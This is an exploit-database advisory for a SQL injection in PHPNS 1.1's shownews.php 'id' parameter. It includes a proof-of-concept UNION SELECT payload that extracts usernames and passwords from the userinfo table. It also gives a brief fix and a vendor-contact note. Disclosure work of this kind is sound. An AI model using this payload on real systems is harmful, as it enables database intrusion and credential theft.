PHPNS 1.1 (shownews.php id) Remote SQL Injection Vulnerability

2007-08-29T00:00:00
ID 1337DAY-ID-2097
Type zdt
Reporter SmOk3
Modified 2007-08-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
PHPNS 1.1 (shownews.php id) Remote SQL Injection Vulnerability
==============================================================



PHPNS SQL Injection

Software: phpns current version (v1.1)
Vendor link: http://phpns.com
Attack: SQL Injection

Discovered by: David Sopas Ferreira a.k.a SmOk3 

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable
system. This may compromise the integrity of your database and/or
expose sensitive information. Vulnerable variable is $nid and maybe
others.

Proof of Concept:
/phpns/shownews.php?id=1'[SQL Injection]

Shows username : pass from userinfo
/phpns/shownews.php?id=1' union select all
null,null,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),null,null,null
from userinfo/*


Solution:

Your script should filter metacharacters from user input.

Vendor:

Contacted and replyed that they are fixing it.



#  0day.today [2018-01-09]  #